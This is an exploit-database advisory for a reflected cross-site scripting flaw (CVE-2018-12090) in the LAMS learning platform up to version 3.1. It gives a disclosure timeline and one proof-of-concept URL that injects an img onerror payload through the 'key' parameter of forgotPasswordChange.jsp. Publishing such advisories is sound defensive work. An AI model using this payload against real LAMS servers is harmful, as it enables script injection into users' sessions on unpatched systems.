LAMS < 3.1 - Cross-Site Scripting

vendor:

LAMS

by:

Nikola Kojic

7.5

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: LAMS

Affected Version From: <= 3.1

Affected Version To: <= 3.1

Patch Exists: YES

Related CWE: 2018-12090

CPE: a:lams_foundation:lams

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Java

2018

LAMS < 3.1 - Cross-Site Scripting

There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.

Mitigation:

Patch released on 2018-06-15

Source

Exploit-DB raw data:

# Exploit Title: LAMS < 3.1 - Cross-Site Scripting
# Date: 2018-08-05
# Exploit Author: Nikola Kojic
# Website: https://ras-it.rs/
# Vendor Homepage: https://www.lamsfoundation.org/
# Software Link: https://www.lamsfoundation.org/downloads_home.htm
# Category: Web Application
# Platform: Java
# Version: <= 3.1
# CVE: 2018-12090

# Vendor Description:
# LAMS is a revolutionary new tool for designing, managing and delivering online collaborative 
# learning activities. It provides teachers with a highly intuitive visual authoring 
# environment for creating sequences of learning activities.

# Technical Details and Exploitation:
# There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows 
# a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET
# parameter during a forgotPasswordChange.jsp?key= password change.

# Proof of Concept:
http://localhost:8080/lams/forgotPasswordChange.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

# Timeline:
# 2018-06-07: Discovered
# 2018-06-08: Vendor notified
# 2018-06-08: Vendor replies
# 2018-06-11: CVE number requested
# 2018-06-11: CVE number assigned
# 2018-06-15: Patch released
# 2018-08-05: Public disclosure